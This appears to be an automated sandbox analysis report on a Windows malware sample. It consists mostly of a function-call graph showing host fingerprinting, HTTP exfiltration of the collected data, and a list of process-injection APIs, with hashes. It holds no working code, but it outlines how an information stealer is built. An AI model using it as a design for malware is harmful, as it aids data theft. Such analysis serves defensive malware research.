lstrcpyA 75385->75386 75387 92615e 75386->75387 75388 926174 InternetConnectA 75387->75388 75388->75345 75389 9261a2 HttpOpenRequestA 75388->75389 75390 9261e2 75389->75390 75391 9266f3 InternetCloseHandle 75389->75391 75392 926206 75390->75392 75393 9261ea InternetSetOptionA 75390->75393 75391->75345 75394 9305de 3 API calls 75392->75394 75393->75392 75395 92621c 75394->75395 75396 930562 lstrcpyA 75395->75396 75397 926227 75396->75397 75398 93059c 2 API calls 75397->75398 75399 926249 75398->75399 75400 930562 lstrcpyA 75399->75400 75401 926254 75400->75401 75402 9305de 3 API calls 75401->75402 75403 926275 75402->75403 75404 930562 lstrcpyA 75403->75404 75405 926280 75404->75405 75406 9305de 3 API calls 75405->75406 75407 9262a2 75406->75407 75408 930562 lstrcpyA 75407->75408 75409 9262ad 75408->75409 75410 9305de 3 API calls 75409->75410 75411 9262cf 75410->75411 75412 930562 lstrcpyA 75411->75412 75413 9262da 75412->75413 75414 9305de 3 API calls 75413->75414 75415 9262fb 75414->75415 75416 930562 lstrcpyA 75415->75416 75417 926306 75416->75417 75418 93059c 2 API calls 75417->75418 75419 926325 75418->75419 75420 930562 lstrcpyA 75419->75420 75421 926330 75420->75421 75422 9305de 3 API calls 75421->75422 75423 926351 75422->75423 75424 930562 lstrcpyA 75423->75424 75425 92635c 75424->75425 75426 9305de 3 API calls 75425->75426 75427 92637d 75426->75427 75428 930562 lstrcpyA 75427->75428 75429 926388 75428->75429 75430 93059c 2 API calls 75429->75430 75431 9263aa 75430->75431 75432 930562 lstrcpyA 75431->75432 75433 9263b5 75432->75433 75434 9305de 3 API calls 75433->75434 75435 9263d6 75434->75435 75436 930562 lstrcpyA 75435->75436 75437 9263e1 75436->75437 75438 9305de 3 API calls 75437->75438 75439 926403 75438->75439 75440 930562 lstrcpyA 75439->75440 75441 92640e 75440->75441 75442 9305de 3 API calls 75441->75442 75443 92642f 75442->75443 75444 930562 lstrcpyA 75443->75444 75445 92643a 75444->75445 75446 9305de 3 API calls 75445->75446 75447 92645b 75446->75447 75448 930562 lstrcpyA 75447->75448 75449 926466 75448->75449 75450 9305de 3 API calls 75449->75450 75451 926487 75450->75451 75452 930562 lstrcpyA 75451->75452 75453 926492 75452->75453 75454 9305de 3 API calls 75453->75454 75455 9264b3 75454->75455 75456 930562 lstrcpyA 75455->75456 75457 9264be 75456->75457 75458 9305de 3 API calls 75457->75458 75459 9264df 75458->75459 75460 930562 lstrcpyA 75459->75460 75461 9264ea 75460->75461 75462 93059c 2 API calls 75461->75462 75463 926506 75462->75463 75464 930562 lstrcpyA 75463->75464 75465 926511 75464->75465 75466 9305de 3 API calls 75465->75466 75467 926532 75466->75467 75468 930562 lstrcpyA 75467->75468 75469 92653d 75468->75469 75470 9305de 3 API calls 75469->75470 75471 92655f 75470->75471 75472 930562 lstrcpyA 75471->75472 75473 92656a 75472->75473 75474 9305de 3 API calls 75473->75474 75475 92658b 75474->75475 75476 930562 lstrcpyA 75475->75476 75477 926596 75476->75477 75478 9305de 3 API calls 75477->75478 75479 9265b7 75478->75479 75480 930562 lstrcpyA 75479->75480 75481 9265c2 75480->75481 75482 93059c 2 API calls 75481->75482 75483 9265e1 75482->75483 75484 930562 lstrcpyA 75483->75484 75485 9265ec 75484->75485 75486 9265f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 75485->75486 76481 9471e0 75486->76481 75488 92663e lstrlenA lstrlenA 75489 9471e0 _memmove 75488->75489 75490 926667 lstrlenA HttpSendRequestA 75489->75490 75491 9266d2 InternetReadFile 75490->75491 75492 9266ec InternetCloseHandle 75491->75492 75494 926692 75491->75494 75492->75391 75493 9305de 3 API calls 75493->75494 75494->75491 75494->75492 75494->75493 75495 930562 lstrcpyA 75494->75495 75495->75494 75497 93350c 75496->75497 75498 9334ae 75496->75498 75497->74138 75499 9334f6 strtok_s 75498->75499 75500 93051e 2 API calls 75498->75500 75501 93051e 2 API calls 75498->75501 75499->75497 75499->75498 75500->75499 75501->75498 75505 9332c6 75502->75505 75503 9333c5 75503->74151 75504 933372 StrCmpCA 75504->75505 75505->75503 75505->75504 75506 93051e 2 API calls 75505->75506 75507 9333a7 strtok_s 75505->75507 75508 933341 StrCmpCA 75505->75508 75509 93331c StrCmpCA 75505->75509 75510 9332eb StrCmpCA 75505->75510 75506->75505 75507->75505 75508->75505 75509->75505 75510->75505 75512 933474 75511->75512 75516 9333fc 75511->75516 75512->74164 75513 93051e 2 API calls 75515 93345a strtok_s 75513->75515 75514 933422 StrCmpCA 75514->75516 75515->75512 75515->75516 75516->75513 75516->75514 75516->75515 75517 93051e 2 API calls 75516->75517 75517->75516 75519 9304bc lstrcpyA 75518->75519 75520 933bdf 75519->75520 75521 9305de 3 API calls 75520->75521 75522 933bef 75521->75522 75523 930562 lstrcpyA 75522->75523 75524 933bf7 75523->75524 75525 9305de 3 API calls 75524->75525 75526 933c0f 75525->75526 75527 930562 lstrcpyA 75526->75527 75528 933c17 75527->75528 75529 9305de 3 API calls 75528->75529 75530 933c2f 75529->75530 75531 930562 lstrcpyA 75530->75531 75532 933c37 75531->75532 75533 9305de 3 API calls 75532->75533 75534 933c4f 75533->75534 75535 930562 lstrcpyA 75534->75535 75536 933c57 75535->75536 75537 9305de 3 API calls 75536->75537 75538 933c6f 75537->75538 75539 930562 lstrcpyA 75538->75539 75540 933c77 75539->75540 76488 930c95 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 75540->76488 75543 9305de 3 API calls 75544 933c90 75543->75544 75545 930562 lstrcpyA 75544->75545 75546 933c98 75545->75546 75547 9305de 3 API calls 75546->75547 75548 933cb0 75547->75548 75549 930562 lstrcpyA 75548->75549 75550 933cb8 75549->75550 75551 9305de 3 API calls 75550->75551 75552 933cd0 75551->75552 75553 930562 lstrcpyA 75552->75553 75554 933cd8 75553->75554 76491 9315a9 75554->76491 75557 9305de 3 API calls 75558 933cf1 75557->75558 75559 930562 lstrcpyA 75558->75559 75560 933cf9 75559->75560 75561 9305de 3 API calls 75560->75561 75562 933d11 75561->75562 75563 930562 lstrcpyA 75562->75563 75564 933d19 75563->75564 75565 9305de 3 API calls 75564->75565 75566 933d31 75565->75566 75567 930562 lstrcpyA 75566->75567 75568 933d39 75567->75568 75569 931659 11 API calls 75568->75569 75570 933d49 75569->75570 75571 93059c 2 API calls 75570->75571 75572 933d56 75571->75572 75573 930562 lstrcpyA 75572->75573 75574 933d5e 75573->75574 75575 9305de 3 API calls 75574->75575 75576 933d7e 75575->75576 75577 930562 lstrcpyA 75576->75577 75578 933d86 75577->75578 75579 9305de 3 API calls 75578->75579 75580 933d9e 75579->75580 75581 930562 lstrcpyA 75580->75581 75582 933da6 75581->75582 75583 930977 19 API calls 75582->75583 75584 933db6 75583->75584 75585 93059c 2 API calls 75584->75585 75586 933dc3 75585->75586 75587 930562 lstrcpyA 75586->75587 75588 933dcb 75587->75588 75589 9305de 3 API calls 75588->75589 75590 933deb 75589->75590 75591 930562 lstrcpyA 75590->75591 75592 933df3 75591->75592 75593 9305de 3 API calls 75592->75593 75594 933e0b 75593->75594 75595 930562 lstrcpyA 75594->75595 75596 933e13 75595->75596 75597 933e1b GetCurrentProcessId 75596->75597 76498 93221f OpenProcess 75597->76498 75600 93059c 2 API calls 75601 933e38 75600->75601 75602 930562 lstrcpyA 75601->75602 75603 933e40 75602->75603 75604 9305de 3 API calls 75603->75604 75605 933e60 75604->75605 75606 930562 lstrcpyA 75605->75606 75607 933e68 75606->75607 75608 9305de 3 API calls 75607->75608 75609 933e80 75608->75609 75610 930562 lstrcpyA 75609->75610 75611 933e88 75610->75611 75612 9305de 3 API calls 75611->75612 75613 933ea0 75612->75613 75614 930562 lstrcpyA 75613->75614 75615 933ea8 75614->75615 75616 9305de 3 API calls 75615->75616 75617 933ec0 75616->75617 75618 930562 lstrcpyA 75617->75618 75619 933ec8 75618->75619 76505 930b05 GetProcessHeap HeapAlloc 75619->76505 75622 9305de 3 API calls 75623 933ee1 75622->75623 75624 930562 lstrcpyA 75623->75624 75625 933ee9 75624->75625 75626 9305de 3 API calls 75625->75626 75627 933f01 75626->75627 75628 930562 lstrcpyA 75627->75628 75629 933f09 75628->75629 75630 9305de 3 API calls 75629->75630 75631 933f21 75630->75631 75632 930562 lstrcpyA 75631->75632 75633 933f29 75632->75633 76512 9317dc 75633->76512 75636 93059c 2 API calls 75637 933f46 75636->75637 75638 930562 lstrcpyA 75637->75638 75639 933f4e 75638->75639 75640 9305de 3 API calls 75639->75640 75641 933f6e 75640->75641 75642 930562 lstrcpyA 75641->75642 75643 933f76 75642->75643 75644 9305de 3 API calls 75643->75644 75645 933f8e 75644->75645 75646 930562 lstrcpyA 75645->75646 75647 933f96 75646->75647 76529 93196c 75647->76529 75649 933fa7 75650 93059c 2 API calls 75649->75650 75651 933fb5 75650->75651 75652 930562 lstrcpyA 75651->75652 75653 933fbd 75652->75653 75654 9305de 3 API calls 75653->75654 75655 933fdd 75654->75655 75656 930562 lstrcpyA 75655->75656 75657 933fe5 75656->75657 75658 9305de 3 API calls 75657->75658 75659 933ffd 75658->75659 75660 930562 lstrcpyA 75659->75660 75661 934005 75660->75661 75662 930c5a 3 API calls 75661->75662 75663 934012 75662->75663 75664 9305de 3 API calls 75663->75664 75665 93401e 75664->75665 75666 930562 lstrcpyA 75665->75666 75667 934026 75666->75667 75668 9305de 3 API calls 75667->75668 75669 93403e 75668->75669 75670 930562 lstrcpyA 75669->75670 75671 934046 75670->75671 75672 9305de 3 API calls 75671->75672 75673 93405e 75672->75673 75674 930562 lstrcpyA 75673->75674 75675 934066 75674->75675 76544 930c28 GetProcessHeap HeapAlloc GetUserNameA 75675->76544 75677 934073 75678 9305de 3 API calls 75677->75678 75679 93407f 75678->75679 75680 930562 lstrcpyA 75679->75680 75681 934087 75680->75681 75682 9305de 3 API calls 75681->75682 75683 93409f 75682->75683 75684 930562 lstrcpyA 75683->75684 75685 9340a7 75684->75685 75686 9305de 3 API calls 75685->75686 75687 9340bf 75686->75687 75688 930562 lstrcpyA 75687->75688 75689 9340c7 75688->75689 76545 931538 7 API calls 75689->76545 75692 93059c 2 API calls 75693 9340e6 75692->75693 75694 930562 lstrcpyA 75693->75694 75695 9340ee 75694->75695 75696 9305de 3 API calls 75695->75696 75697 93410e 75696->75697 75698 930562 lstrcpyA 75697->75698 75699 934116 75698->75699 75700 9305de 3 API calls 75699->75700 75701 93412e 75700->75701 75702 930562 lstrcpyA 75701->75702 75703 934136 75702->75703 76548 930db0 75703->76548 75706 93059c 2 API calls 75707 934153 75706->75707 75708 930562 lstrcpyA 75707->75708 75709 93415b 75708->75709 75710 9305de 3 API calls 75709->75710 75711 93417b 75710->75711 75712 930562 lstrcpyA 75711->75712 75713 934183 75712->75713 75714 9305de 3 API calls 75713->75714 75715 93419b 75714->75715 75716 930562 lstrcpyA 75715->75716 75717 9341a3 75716->75717 75718 930c95 9 API calls 75717->75718 75719 9341b0 75718->75719 75720 9305de 3 API calls 75719->75720 75721 9341bc 75720->75721 75722 930562 lstrcpyA 75721->75722 75723 9341c4 75722->75723 75724 9305de 3 API calls 75723->75724 75725 9341dc 75724->75725 75726 930562 lstrcpyA 75725->75726 75727 9341e4 75726->75727 75728 9305de 3 API calls 75727->75728 75729 9341fc 75728->75729 75730 930562 lstrcpyA 75729->75730 75731 934204 75730->75731 76560 930d03 GetProcessHeap HeapAlloc GetTimeZoneInformation 75731->76560 75734 9305de 3 API calls 75735 93421d 75734->75735 75736 930562 lstrcpyA 75735->75736 75737 934225 75736->75737 75738 9305de 3 API calls 75737->75738 75739 93423d 75738->75739 75740 930562 lstrcpyA 75739->75740 75741 934245 75740->75741 75742 9305de 3 API calls 75741->75742 75743 93425d 75742->75743 75744 930562 lstrcpyA 75743->75744 75745 934265 75744->75745 75746 9305de 3 API calls 75745->75746 75747 93427d 75746->75747 75748 930562 lstrcpyA 75747->75748 75749 934285 75748->75749 76565 930f26 GetProcessHeap HeapAlloc RegOpenKeyExA 75749->76565 75751 934292 75752 9305de 3 API calls 75751->75752 75753 93429e 75752->75753 75754 930562 lstrcpyA 75753->75754 75755 9342a6 75754->75755 75756 9305de 3 API calls 75755->75756 75757 9342be 75756->75757 75758 930562 lstrcpyA 75757->75758 75759 9342c6 75758->75759 75760 9305de 3 API calls 75759->75760 75761 9342de 75760->75761 75762 930562 lstrcpyA 75761->75762 75763 9342e6 75762->75763 76568 930fdc 75763->76568 75766 9305de 3 API calls 75767 9342ff 75766->75767 75768 930562 lstrcpyA 75767->75768 75769 934307 75768->75769 75770 9305de 3 API calls 75769->75770 75771 93431f 75770->75771 75772 930562 lstrcpyA 75771->75772 75773 934327 75772->75773 75774 9305de 3 API calls 75773->75774 75775 93433f 75774->75775 75776 930562 lstrcpyA 75775->75776 75777 934347 75776->75777 76585 930f8f GetSystemInfo wsprintfA 75777->76585 75780 9305de 3 API calls 75781 934360 75780->75781 75782 930562 lstrcpyA 75781->75782 75783 934368 75782->75783 75784 9305de 3 API calls 75783->75784 75785 934380 75784->75785 75786 930562 lstrcpyA 75785->75786 75787 934388 75786->75787 75788 9305de 3 API calls 75787->75788 75789 9343a0 75788->75789 75790 930562 lstrcpyA 75789->75790 75791 9343a8 75790->75791 76588 9310ee GetProcessHeap HeapAlloc 75791->76588 75794 9305de 3 API calls 75795 9343c1 75794->75795 75796 930562 lstrcpyA 75795->75796 75797 9343c9 75796->75797 75798 9305de 3 API calls 75797->75798 75799 9343e4 75798->75799 75800 930562 lstrcpyA 75799->75800 75801 9343ec 75800->75801 75802 9305de 3 API calls 75801->75802 75803 934407 75802->75803 75804 930562 lstrcpyA 75803->75804 75805 93440f 75804->75805 76595 931167 75805->76595 75808 93059c 2 API calls 75809 93442f 75808->75809 75810 930562 lstrcpyA 75809->75810 75811 934437 75810->75811 75812 9305de 3 API calls 75811->75812 75813 93445a 75812->75813 75814 930562 lstrcpyA 75813->75814 75815 934462 75814->75815 75816 9305de 3 API calls 75815->75816 75817 93447a 75816->75817 75818 930562 lstrcpyA 75817->75818 75819 934482 75818->75819 76603 93147a 75819->76603 75822 93059c 2 API calls 75823 9344a2 75822->75823 75824 930562 lstrcpyA 75823->75824 75825 9344aa 75824->75825 75826 9305de 3 API calls 75825->75826 75827 9344d0 75826->75827 75828 930562 lstrcpyA 75827->75828 75829 9344d8 75828->75829 75830 9305de 3 API calls 75829->75830 75831 9344f3 75830->75831 75832 930562 lstrcpyA 75831->75832 75833 9344fb 75832->75833 76613 9311d8 75833->76613 75836 93059c 2 API calls 75837 934520 75836->75837 75838 930562 lstrcpyA 75837->75838 75839 934528 75838->75839 75840 9311d8 21 API calls 75839->75840 75841 934549 75840->75841 75842 93059c 2 API calls 75841->75842 75843 934558 75842->75843 75844 930562 lstrcpyA 75843->75844 75845 934560 75844->75845 75846 9305de 3 API calls 75845->75846 75847 934583 75846->75847 75848 930562 lstrcpyA 75847->75848 75849 93458b 75848->75849 75850 921cfd lstrcpyA 75849->75850 75851 9345a0 lstrlenA 75850->75851 75852 9304bc lstrcpyA 75851->75852 75853 9345bd 75852->75853 76633 937023 75853->76633 75855 9345c6 75855->74171 76358->75033 76360 93d1a8 setSBUpLow 5 API calls 76359->76360 76361 9325d6 76360->76361 76361->74243 76361->74248 76363 9304bc lstrcpyA 76362->76363 76364 922a05 76363->76364 76364->75101 76366 9304bc lstrcpyA 76365->76366 76367 922a16 76366->76367 76367->75101 76369 9304bc lstrcpyA 76368->76369 76370 922a38 76369->76370 76370->75101 76372 9304bc lstrcpyA 76371->76372 76373 922a49 76372->76373 76373->75101 76375 9304bc lstrcpyA 76374->76375 76376 922a5a 76375->76376 76376->75101 76378 9304ee lstrcpyA 76377->76378 76379 936f38 76378->76379 76380 9304ee lstrcpyA 76379->76380 76381 936f43 76380->76381 76382 9304ee lstrcpyA 76381->76382 76383 936f4e 76382->76383 76383->75129 76384->75101 76385->75101 76386->75101 76387->75101 76388->75149 76389->75149 76391 9304bc lstrcpyA 76390->76391 76392 93692a 76391->76392 76393 9304ee lstrcpyA 76392->76393 76394 936937 76393->76394 76423 926963 76394->76423 76397 930562 lstrcpyA 76398 93694b 76397->76398 76399 936953 StrCmpCA 76398->76399 76400 936966 lstrlenA 76399->76400 76408 9369af 76399->76408 76451 931df4 76400->76451 76403 9304bc lstrcpyA 76409 9369d3 76403->76409 76404 936978 StrStrA 76405 936988 lstrlenA 76404->76405 76404->76408 76455 931c9f 76405->76455 76408->76403 76409->75149 76410->75149 76412 9304ee lstrcpyA 76411->76412 76413 936894 76412->76413 76414 9304ee lstrcpyA 76413->76414 76415 9368a1 76414->76415 76416 926963 27 API calls 76415->76416 76417 9368aa StrCmpCA 76416->76417 76418 9368d3 76417->76418 76419 9368c2 76417->76419 76421 9304bc lstrcpyA 76418->76421 76420 9304ee lstrcpyA 76419->76420 76422 9368d1 76420->76422 76421->76422 76422->75149 76424 9304ee lstrcpyA 76423->76424 76425 92698f 76424->76425 76457 924ab6 76425->76457 76427 92699b 76428 9304bc lstrcpyA 76427->76428 76429 9269bb InternetOpenA StrCmpCA 76428->76429 76430 9269e9 76429->76430 76431 9269f6 InternetConnectA 76430->76431 76432 926b6e 76430->76432 76434 926b62 InternetCloseHandle 76431->76434 76435 926a22 HttpOpenRequestA 76431->76435 76433 9304ee lstrcpyA 76432->76433 76444 926ac6 76433->76444 76434->76432 76436 926a63 76435->76436 76437 926b56 InternetCloseHandle 76435->76437 76438 926a83 HttpSendRequestA HttpQueryInfoA 76436->76438 76439 926a67 InternetSetOptionA 76436->76439 76437->76434 76440 926ab6 76438->76440 76441 926acb 76438->76441 76439->76438 76442 9304bc lstrcpyA 76440->76442 76441->76440 76450 926ae1 76441->76450 76442->76444 76443 926b4a InternetCloseHandle 76443->76437 76446 93d1a8 setSBUpLow 5 API calls 76444->76446 76445 926b2b InternetReadFile 76445->76443 76445->76450 76447 926ba9 76446->76447 76447->76397 76448 9305de 3 API calls 76448->76450 76449 930562 lstrcpyA 76449->76450 76450->76443 76450->76445 76450->76448 76450->76449 76452 931e02 76451->76452 76453 931e18 76451->76453 76452->76453 76454 931e06 LocalAlloc 76452->76454 76453->76404 76453->76408 76454->76453 76456 931ca6 lstrlenA 76455->76456 76456->76408 76458 924ac4 76457->76458 76458->76458 76459 924acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 76458->76459 76460 924b27 76459->76460 76460->76427 76462 931682 76461->76462 76463 931711 76461->76463 76464 9304bc lstrcpyA 76462->76464 76465 9304bc lstrcpyA 76463->76465 76467 931695 _memset 76464->76467 76466 93171d 76465->76466 76468 93d1a8 setSBUpLow 5 API calls 76466->76468 76478 9323aa lstrcpyA malloc strncpy 76467->76478 76469 93172a 76468->76469 76469->75171 76471 9316bf lstrcatA 76479 922920 76471->76479 76473 9316dc lstrcatA 76474 9316f9 76473->76474 76475 9304bc lstrcpyA 76474->76475 76476 931707 76475->76476 76476->76466 76477->75174 76478->76471 76480 922924 76479->76480 76480->76473 76482 9471f8 76481->76482 76482->75488 76482->76482 76484 92806a LocalAlloc 76483->76484 76485 926724 76483->76485 76484->76485 76486 92807a CryptStringToBinaryA 76484->76486 76485->75351 76485->75361 76486->76485 76487 928091 LocalFree 76486->76487 76487->76485 76489 93d1a8 setSBUpLow 5 API calls 76488->76489 76490 930d01 76489->76490 76490->75543 76650 943da0 76491->76650 76494 931626 RegCloseKey CharToOemA 76496 93d1a8 setSBUpLow 5 API calls 76494->76496 76495 931605 RegQueryValueExA 76495->76494 76497 931657 76496->76497 76497->75557 76499 932269 76498->76499 76500 93224d K32GetModuleFileNameExA CloseHandle 76498->76500 76501 9304bc lstrcpyA 76499->76501 76500->76499 76502 932275 76501->76502 76503 93d1a8 setSBUpLow 5 API calls 76502->76503 76504 932283 76503->76504 76504->75600 76652 930beb 76505->76652 76508 930b31 76508->75622 76509 930b38 RegOpenKeyExA 76510 930b70 RegCloseKey 76509->76510 76511 930b58 RegQueryValueExA 76509->76511 76510->76508 76511->76510 76659 94f299 76512->76659 76514 9317e8 CoInitializeEx CoInitializeSecurity CoCreateInstance 76515 931840 76514->76515 76516 931848 CoSetProxyBlanket 76515->76516 76519 931939 76515->76519 76522 931878 76516->76522 76517 9304bc lstrcpyA 76518 931964 76517->76518 76520 94f2f5 5 API calls 76518->76520 76519->76517 76521 93196b 76520->76521 76521->75636 76522->76519 76523 9318ac VariantInit 76522->76523 76524 9318cb 76523->76524 76660 93172c 76524->76660 76526 9318d6 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 76527 9304bc lstrcpyA 76526->76527 76528 93192d VariantClear 76527->76528 76528->76518 76669 94f22d 76529->76669 76531 931978 CoInitializeEx CoInitializeSecurity CoCreateInstance 76532 9319ce 76531->76532 76533 9319d6 CoSetProxyBlanket 76532->76533 76537 931a68 76532->76537 76536 931a06 76533->76536 76534 9304bc lstrcpyA 76535 931a93 76534->76535 76535->75649 76536->76537 76538 931a2e VariantInit 76536->76538 76537->76534 76539 931a4d 76538->76539 76670 931d17 LocalAlloc CharToOemW 76539->76670 76541 931a55 76542 9304bc lstrcpyA 76541->76542 76543 931a5c VariantClear 76542->76543 76543->76535 76544->75677 76546 9304bc lstrcpyA 76545->76546 76547 9315a2 76546->76547 76547->75692 76549 9304bc lstrcpyA 76548->76549 76550 930dd7 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 76549->76550 76557 930e11 76550->76557 76559 930ec2 76550->76559 76551 930e17 GetLocaleInfoA 76551->76557 76552 930eda 76554 93d1a8 setSBUpLow 5 API calls 76552->76554 76553 930ece LocalFree 76553->76552 76556 930eea 76554->76556 76555 9305de lstrlenA lstrcpyA lstrcatA 76555->76557 76556->75706 76557->76551 76557->76555 76558 930562 lstrcpyA 76557->76558 76557->76559 76558->76557 76559->76552 76559->76553 76561 930d5b 76560->76561 76562 930d3f wsprintfA 76560->76562 76563 93d1a8 setSBUpLow 5 API calls 76561->76563 76562->76561 76564 930d68 76563->76564 76564->75734 76566 930f81 RegCloseKey 76565->76566 76567 930f69 RegQueryValueExA 76565->76567 76566->75751 76567->76566 76569 931051 GetLogicalProcessorInformationEx 76568->76569 76570 93101d GetLastError 76569->76570 76571 93105c 76569->76571 76572 9310c8 76570->76572 76573 93102c 76570->76573 76673 931b30 GetProcessHeap HeapFree 76571->76673 76576 9310d2 76572->76576 76674 931b30 GetProcessHeap HeapFree 76572->76674 76575 931030 76573->76575 76575->76569 76584 9310c1 76575->76584 76671 931b30 GetProcessHeap HeapFree 76575->76671 76672 931b4d GetProcessHeap HeapAlloc 76575->76672 76581 93d1a8 setSBUpLow 5 API calls 76576->76581 76577 931095 76577->76576 76582 93109e wsprintfA 76577->76582 76583 9310ec 76581->76583 76582->76576 76583->75766 76584->76576 76586 93d1a8 setSBUpLow 5 API calls 76585->76586 76587 930fda 76586->76587 76587->75780 76675 931afb 76588->76675 76591 931134 wsprintfA 76593 93d1a8 setSBUpLow 5 API calls 76591->76593 76594 931165 76593->76594 76594->75794 76596 9304bc lstrcpyA 76595->76596 76602 931188 76596->76602 76597 9311b4 EnumDisplayDevicesA 76598 9311c8 76597->76598 76597->76602 76600 93d1a8 setSBUpLow 5 API calls 76598->76600 76599 93051e 2 API calls 76599->76602 76601 9311d6 76600->76601 76601->75808 76602->76597 76602->76598 76602->76599 76604 9304bc lstrcpyA 76603->76604 76605 93149b CreateToolhelp32Snapshot Process32First 76604->76605 76606 931521 CloseHandle 76605->76606 76612 9314c3 76605->76612 76607 93d1a8 setSBUpLow 5 API calls 76606->76607 76609 931536 76607->76609 76608 93150f Process32Next 76608->76606 76608->76612 76609->75822 76610 9305de lstrlenA lstrcpyA lstrcatA 76610->76612 76611 930562 lstrcpyA 76611->76612 76612->76608 76612->76610 76612->76611 76614 9304bc lstrcpyA 76613->76614 76615 931210 RegOpenKeyExA 76614->76615 76616 93144d 76615->76616 76630 931256 76615->76630 76617 9304ee lstrcpyA 76616->76617 76620 93145e 76617->76620 76618 93125c RegEnumKeyExA 76619 931299 wsprintfA RegOpenKeyExA 76618->76619 76618->76630 76621 931435 RegCloseKey 76619->76621 76622 9312df RegQueryValueExA 76619->76622 76627 93d1a8 setSBUpLow 5 API calls 76620->76627 76624 931441 RegCloseKey 76621->76624 76625 931415 RegCloseKey 76622->76625 76626 931315 lstrlenA 76622->76626 76623 931433 76623->76624 76624->76616 76625->76630 76626->76625 76626->76630 76629 931478 76627->76629 76628 9305de lstrlenA lstrcpyA lstrcatA 76628->76630 76629->75836 76630->76618 76630->76623 76630->76625 76630->76628 76631 931385 RegQueryValueExA 76630->76631 76632 930562 lstrcpyA 76630->76632 76631->76625 76631->76630 76632->76630 76634 937033 76633->76634 76635 930562 lstrcpyA 76634->76635 76636 937050 76635->76636 76637 930562 lstrcpyA 76636->76637 76638 93706c 76637->76638 76639 930562 lstrcpyA 76638->76639 76640 937077 76639->76640 76641 930562 lstrcpyA 76640->76641 76642 937082 76641->76642 76643 937089 Sleep 76642->76643 76644 937099 76642->76644 76643->76642 76645 9370b5 CreateThread WaitForSingleObject 76644->76645 76677 93ce59 76644->76677 76647 9304bc lstrcpyA 76645->76647 76866 936f52 76645->76866 76649 9370dd 76647->76649 76649->75855 76651 9315e1 RegOpenKeyExA 76650->76651 76651->76494 76651->76495 76655 930b7e GetProcessHeap HeapAlloc RegOpenKeyExA 76652->76655 76654 930b2d 76654->76508 76654->76509 76656 930bc1 RegQueryValueExA 76655->76656 76657 930bd8 RegCloseKey 76655->76657 76656->76657 76658 930be8 76657->76658 76658->76654 76659->76514 76668 94f22d 76660->76668 76662 931738 CoCreateInstance 76663 931760 SysAllocString 76662->76663 76664 9317bc 76662->76664 76663->76664 76666 93176f 76663->76666 76664->76526 76665 9317b5 SysFreeString 76665->76664 76666->76665 76667 931793 _wtoi64 SysFreeString 76666->76667 76667->76665 76668->76662 76669->76531 76670->76541 76671->76575 76672->76575 76673->76577 76674->76576 76676 931122 GlobalMemoryStatusEx 76675->76676 76676->76591 76680 93ce11 76677->76680 76681 93ce20 76680->76681 76682 9370b3 76680->76682 76681->76682 76684 93c603 76681->76684 76682->76645 76685 93c62b 76684->76685 76689 93c635 76684->76689 76686 93d1a8 setSBUpLow 5 API calls 76685->76686 76688 93cc3c 76686->76688 76687 93c65f lstrcpyA 76687->76685 76690 93c67c 76687->76690 76688->76682 76689->76685 76689->76687 76691 93c6ec 76690->76691 76819 93ba01 9 API calls 76690->76819 76693 93c6fe 76691->76693 76694 93c70d 76691->76694 76819->76691 76875 94f22d 76866->76875 76868 936f5e lstrlenA 76870 936f6f 76868->76870 76873 936f7a 76868->76873 76869 9304ee lstrcpyA 76869->76873 76871 925482 45 API calls 76871->76873 76872 930562 lstrcpyA 76872->76873 76873->76869 76873->76871 76873->76872 76874 936fe0 StrCmpCA 76873->76874 76874->76870 76874->76873 76875->76868

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00938ADE Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                              • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                              • API String ID: 2238633743-2740034357
                                                                                                                                                                                                              • Opcode ID: 734b5e6788b06057968436ff28dbf813dc10f6507fa0f4e1df7eebaca41b5379
                                                                                                                                                                                                              • Instruction ID: 94151f735e3e2f0937d1e95f54de3e84cff0ce7fcc9845b15f0ec5c93945063c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 734b5e6788b06057968436ff28dbf813dc10f6507fa0f4e1df7eebaca41b5379
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5852E9B5901212AFDB025F60FD499143ABAFF0C34531299A5E92D9B272DF72C8D0EF19
                                                                                                                                                                                                              Function 00934D08 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule

